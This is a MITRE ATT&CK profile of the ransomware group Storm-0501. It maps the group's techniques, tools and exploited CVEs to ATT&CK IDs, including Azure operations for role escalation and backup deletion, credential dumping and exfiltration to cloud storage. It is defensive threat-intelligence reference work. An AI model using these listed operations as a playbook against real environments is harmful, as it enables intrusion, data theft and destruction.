Skip to content

G1053 Storm-0501

Storm-0501 is a financially motivated cyber criminal group that uses commodity and open-source tools to conduct ransomware operations. Storm-0501 has been active since 2021 and has previously been affiliated with Sabbath Ransomware and other Ransomware-as-a-Service (RaaS) variants such as Hive, BlackCat, Hunters International, LockBit 3.0, and Embargo ransomware.1234

Item Value
ID G1053
Associated Names
Version 1.0
Created 19 October 2025
Last Modified 24 October 2025
Navigation Layer View In ATT&CK® Navigator

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account Storm-0501 has utilized an obfuscated version of the Active Directory reconnaissance tool ADRecon.ps1 (obfs.ps1 or recon.ps1) to discover domain accounts.2
enterprise T1087.004 Cloud Account Storm-0501 has conducted enumeration of users, roles, and resources within victim Azure tenants using the tool Azurehound.3
enterprise T1098 Account Manipulation -
enterprise T1098.001 Additional Cloud Credentials Storm-0501 has reset the password of identified administrator accounts that lack MFA and registered their own MFA method.3
enterprise T1098.003 Additional Cloud Roles Storm-0501 has elevated their access to Azure resources using Microsoft.Authorization/elevateAccess/action and Microsoft.Authorization/roleAssignments/write operations to gain User Access Administrator and Owner Azure roles over the victims’ Azure subscriptions.3
enterprise T1110 Brute Force Storm-0501 has leveraged brute force attacks to obtain credentials.2
enterprise T1580 Cloud Infrastructure Discovery Storm-0501 has enumerated compromised cloud environments to identify critical assets, data stores, and back resources.3
enterprise T1526 Cloud Service Discovery Storm-0501 has discovered the victim environment’s protections to include Azure policies, resource locks, and Azure Storage immutability policies.3
enterprise T1059 Command and Scripting Interpreter -
enterprise T1059.001 PowerShell Storm-0501 has leveraged PowerShell to execute commands and scripts.23
enterprise T1059.009 Cloud API Storm-0501 has leveraged Cloud CLI to execute commands and exfiltrate data from compromised environments.3
enterprise T1555 Credentials from Password Stores -
enterprise T1555.005 Password Managers Storm-0501 has stolen credentials contained in the password manager Keepass by utilizing Find-KeePassConfig.ps1.2
enterprise T1555.006 Cloud Secrets Management Stores Storm-0501 has utilized Azure Key Vault to store the encryption key using the operation Microsoft.KeyVault/Vaults/write.3
enterprise T1485 Data Destruction Storm-0501 has destroyed data and backup files.3
enterprise T1486 Data Encrypted for Impact Storm-0501 has encrypted files in victim environments using ransomware as a service (RaaS) including Sabbath, Hive, BlackCat, Hunters International, LockBit 3.0 and Embargo ransomware.3
enterprise T1530 Data from Cloud Storage Storm-0501 had modified Azure Storage account resources through the Microsoft.Storage/storageAccounts/write operation to expose non-remotely accessible accounts for data exfiltration.3
enterprise T1587 Develop Capabilities -
enterprise T1587.003 Digital Certificates Storm-0501 has utilized their own self-signed TLS certificate “Microsoft IT TLS CA 5” with their infrastructure.4
enterprise T1484 Domain or Tenant Policy Modification -
enterprise T1484.001 Group Policy Modification Storm-0501 distributed Group Policy Objects to tamper with security products.2
enterprise T1484.002 Trust Modification Storm-0501 created a new federated domain within the victim Microsoft Entra tenant using Global Administrator level access to establish a persistent backdoor for later use.23
enterprise T1482 Domain Trust Discovery Storm-0501 has used Windows native utility Nltest nltest.exe for discovery.2
enterprise T1567 Exfiltration Over Web Service -
enterprise T1567.002 Exfiltration to Cloud Storage Storm-0501 has exfiltrated stolen data to the MEGA file sharing site.4 Storm-0501 has also utilized Rclone to exfiltrate data from victim environments to cloud storage such as MegaSync.2 Storm-0501 has exfiltrated data to their own infrastructure utilizing AzCopy Command-Line tool (CLI).3
enterprise T1190 Exploit Public-Facing Application Storm-0501 has exploited N-day vulnerabilities associated with public facing services to gain initial access to victim environments to include Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler “Citrix Bleed” (CVE-2023-4966), and Adobe ColdFusion 2016 (CVE-2023-29300 or CVE-2023-38203).2
enterprise T1657 Financial Theft Storm-0501 has engaged in double-extortion ransomware, exfiltrating data and directly contacting victims when the primary organization refuses to pay along with posting data on their data leak sites.134
enterprise T1490 Inhibit System Recovery Storm-0501 has deleted snapshots, restore points, storage accounts, and backup services to prevent remediation and restoration.3 Storm-0501 has also impacted Azure resources through the targeting of Microsoft.Compute/snapshots/delete,
Microsoft.Compute/restorePointCollections/delete,
Microsoft.Storage/storageAccounts/delete, and
Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete.3
enterprise T1036 Masquerading -
enterprise T1036.004 Masquerade Task or Service Storm-0501 has utilized Rclone masqueraded as svhost.exe and scvhost.exe.2
enterprise T1556 Modify Authentication Process -
enterprise T1556.009 Conditional Access Policies Storm-0501 has registered their own MFA method, and leveraged a victim hybrid joined server to circumvent Conditional Access Policies.3
enterprise T1578 Modify Cloud Compute Infrastructure -
enterprise T1578.003 Delete Cloud Instance Storm-0501 has conducted mass deletion of cloud data stores and resources from Azure subscriptions.3
enterprise T1027 Obfuscated Files or Information -
enterprise T1027.002 Software Packing Storm-0501 has used Themida to pack Cobalt Strike payloads.4
enterprise T1588 Obtain Capabilities -
enterprise T1588.006 Vulnerabilities Storm-0501 has obtained capabilities to exploit N-day vulnerabilities associated with public facing services to gain initial access to victim environments to include Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler “Citrix Bleed” (CVE-2023-4966), and Adobe ColdFusion 2016 (CVE-2023-29300 or CVE-2023-38203).2
enterprise T1003 OS Credential Dumping Storm-0501 has used the SecretsDump module within Impacket can perform credential dumping to obtain account and password information.2
enterprise T1003.006 DCSync Storm-0501 has utilized DCSync to extract credentials from victims.3
enterprise T1057 Process Discovery Storm-0501 has discovered running processes through tasklist.exe.2
enterprise T1219 Remote Access Tools -
enterprise T1219.002 Remote Desktop Software Storm-0501 has used legitimate remote monitoring and management (RMM) tools including AnyDesk, NinjaOne, and Level.io.2
enterprise T1021 Remote Services -
enterprise T1021.006 Windows Remote Management Storm-0501 has utilized the post-exploitation tool known as Evil-WinRM that uses PowerShell over Windows Remote Management (WinRM) for remote code execution.3
enterprise T1021.007 Cloud Services Storm-0501 has used compromised Entra Connect Sync Server to move laterally within the victim environment.3
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Storm-0501 had used a scheduled task named “SysUpdate” that was registered via GPO on devices in the network to distribute the Embargo ransomware.2
enterprise T1518 Software Discovery -
enterprise T1518.001 Security Software Discovery Storm-0501 has detected endpoint security solutions using sc query sense and sc query windefend.3
enterprise T1218 System Binary Proxy Execution -
enterprise T1218.010 Regsvr32 Storm-0501 has launched Cobalt Strike Beacon files using regsvr32.exe.2
enterprise T1218.011 Rundll32 Storm-0501 has launched Cobalt Strike Beacon files with rundll32.exe.2
enterprise T1082 System Information Discovery Storm-0501 has leveraged native Windows tools and commands such as systeminfo and open-source tools including OSQuery and ossec-win32 to query details about the endpoint.2
enterprise T1614 System Location Discovery -
enterprise T1614.001 System Language Discovery Storm-0501 has identified system language codes on a compromised host to determine if the victim falls under a non-supported language code that is prohibited for targeting, including victims associated with Russia and other Commonwealth of Independent States (CIS) that may draw attention of law enforcement in countries where the ransomware operator or affiliates may reside/operate from.14
enterprise T1537 Transfer Data to Cloud Account Storm-0501 has copied data from the victims environment to their own infrastructure leveraging AzCopy CLI.3
enterprise T1552 Unsecured Credentials -
enterprise T1552.004 Private Keys Storm-0501 has leveraged the Azure Owner role to access and steal the Storage Account Access keys using the Microsoft.Storage/storageAccounts/listkeys/action operation.3
enterprise T1078 Valid Accounts -
enterprise T1078.004 Cloud Accounts Storm-0501 has leveraged compromised accounts to access Microsoft Entra Connect, which was used to synchronize on-premises identities and Microsoft Entra identities, allowing users to sign into both environments with the same password.2 Storm-0501 has also used the victim Global Administrator account that lacked any registered MFA method to access victim cloud environments.3 Storm-0501 has leveraged Storage Account Access Keys within the victim environment.3

Software

ID Name References Techniques
S0677 AADInternals Storm-0501 used the PowerShell module AADInternals to create a back door within the victim tenant, thus allowing for the impersonation of any user in the organization and bypassing MFA to sign in to any application to include Office 365.2 Cloud Account:Account Discovery Device Registration:Account Manipulation Cloud Administration Command Cloud Service Discovery PowerShell:Command and Scripting Interpreter Cloud Account:Create Account Data from Cloud Storage Trust Modification:Domain or Tenant Policy Modification Exfiltration Over Alternative Protocol SAML Tokens:Forge Web Credentials Email Addresses:Gather Victim Identity Information Domain Properties:Gather Victim Network Information Hybrid Identity:Modify Authentication Process Multi-Factor Authentication:Modify Authentication Process Modify Registry LSA Secrets:OS Credential Dumping Cloud Groups:Permission Groups Discovery Spearphishing Link:Phishing Spearphishing Link:Phishing for Information Steal Application Access Token Steal or Forge Authentication Certificates Silver Ticket:Steal or Forge Kerberos Tickets Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials
S0154 Cobalt Strike Storm-0501 has utilized Cobalt Strike for C2 communications and used a unique “license_id” of “666.”2 Sudo and Sudo Caching:Abuse Elevation Control Mechanism Bypass User Account Control:Abuse Elevation Control Mechanism Parent PID Spoofing:Access Token Manipulation Token Impersonation/Theft:Access Token Manipulation Make and Impersonate Token:Access Token Manipulation Domain Account:Account Discovery DNS:Application Layer Protocol Web Protocols:Application Layer Protocol File Transfer Protocols:Application Layer Protocol BITS Jobs Browser Session Hijacking JavaScript:Command and Scripting Interpreter Visual Basic:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Python:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Standard Encoding:Data Encoding Data from Local System Protocol or Service Impersonation:Data Obfuscation Data Transfer Size Limits Deobfuscate/Decode Files or Information Asymmetric Cryptography:Encrypted Channel Symmetric Cryptography:Encrypted Channel Exploitation for Client Execution Exploitation for Privilege Escalation File and Directory Discovery Process Argument Spoofing:Hide Artifacts Disable or Modify Tools:Impair Defenses Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Modify Registry Native API Network Service Discovery Network Share Discovery Non-Application Layer Protocol Indicator Removal from Tools:Obfuscated Files or Information Obfuscated Files or Information Office Template Macros:Office Application Startup LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery Process Discovery Dynamic-link Library Injection:Process Injection Process Hollowing:Process Injection Process Injection Protocol Tunneling Domain Fronting:Proxy Internal Proxy:Proxy Query Registry Reflective Code Loading Remote Desktop Protocol:Remote Services SSH:Remote Services Windows Remote Management:Remote Services SMB/Windows Admin Shares:Remote Services Distributed Component Object Model:Remote Services Remote System Discovery Scheduled Transfer Screen Capture Software Discovery Code Signing:Subvert Trust Controls Rundll32:System Binary Proxy Execution System Network Configuration Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services Pass the Hash:Use Alternate Authentication Material Domain Accounts:Valid Accounts Local Accounts:Valid Accounts Windows Management Instrumentation
S1247 Embargo Storm-0501 has used Embargo for ransomware activities.23 Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Windows Command Shell:Command and Scripting Interpreter Windows Service:Create or Modify System Process Data Encrypted for Impact Deobfuscate/Decode Files or Information Mutual Exclusion:Execution Guardrails Exploitation for Privilege Escalation File and Directory Discovery Financial Theft Safe Mode Boot:Impair Defenses File Deletion:Indicator Removal Inhibit System Recovery Modify Registry Native API Network Share Discovery Encrypted/Encoded File:Obfuscated Files or Information Process Discovery Scheduled Task:Scheduled Task/Job Selective Exclusion Service Stop System Service Discovery Service Execution:System Services
S0357 Impacket Storm-0501 has used Impacket to extract credentials over the network and from victim devices.2 LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Lateral Tool Transfer Network Sniffing NTDS:OS Credential Dumping LSASS Memory:OS Credential Dumping Security Account Manager:OS Credential Dumping LSA Secrets:OS Credential Dumping Kerberoasting:Steal or Forge Kerberos Tickets Ccache Files:Steal or Forge Kerberos Tickets Service Execution:System Services Windows Management Instrumentation
S0039 Net Storm-0501 has used the Net utility on the Windows operating system.23 Domain Account:Account Discovery Local Account:Account Discovery Additional Local or Domain Groups:Account Manipulation Local Account:Create Account Domain Account:Create Account Network Share Connection Removal:Indicator Removal Network Share Discovery Password Policy Discovery Domain Groups:Permission Groups Discovery Local Groups:Permission Groups Discovery SMB/Windows Admin Shares:Remote Services Remote System Discovery System Network Connections Discovery System Service Discovery Service Execution:System Services System Time Discovery
S0359 Nltest Storm-0501 has used Windows native utility Nltest, e.g. nltest.exe, for discovery.2 Domain Trust Discovery Remote System Discovery System Network Configuration Discovery
S1040 Rclone Storm-0501 has utilized Rclone for data exfiltration.2 Archive via Utility:Archive Collected Data Data Transfer Size Limits Exfiltration Over Asymmetric Encrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration Over Unencrypted Non-C2 Protocol:Exfiltration Over Alternative Protocol Exfiltration to Cloud Storage:Exfiltration Over Web Service File and Directory Discovery
S0057 Tasklist Storm-0501 discovered running processes through tasklist.exe.2 Process Discovery Security Software Discovery:Software Discovery System Service Discovery

References

  1. Avertium. (2022, January 11). An In-Depth Look at Ransomware Gang, Sabbath. Retrieved October 19, 2025. 

  2. Microsoft Threat Intelligence. (2024, September 26). Storm-0501: Ransomware attacks expanding to hybrid cloud environments. Retrieved October 19, 2025. 

  3. Microsoft Threat Intelligence. (2025, August 27). Storm-0501’s evolving techniques lead to cloud-based ransomware. Retrieved October 19, 2025. 

  4. Tyler McLellan, Brandan Schondorfer. (2021, November 29). Kitten.gif: Meet the Sabbath Ransomware Affiliate Program, Again. Retrieved October 19, 2025.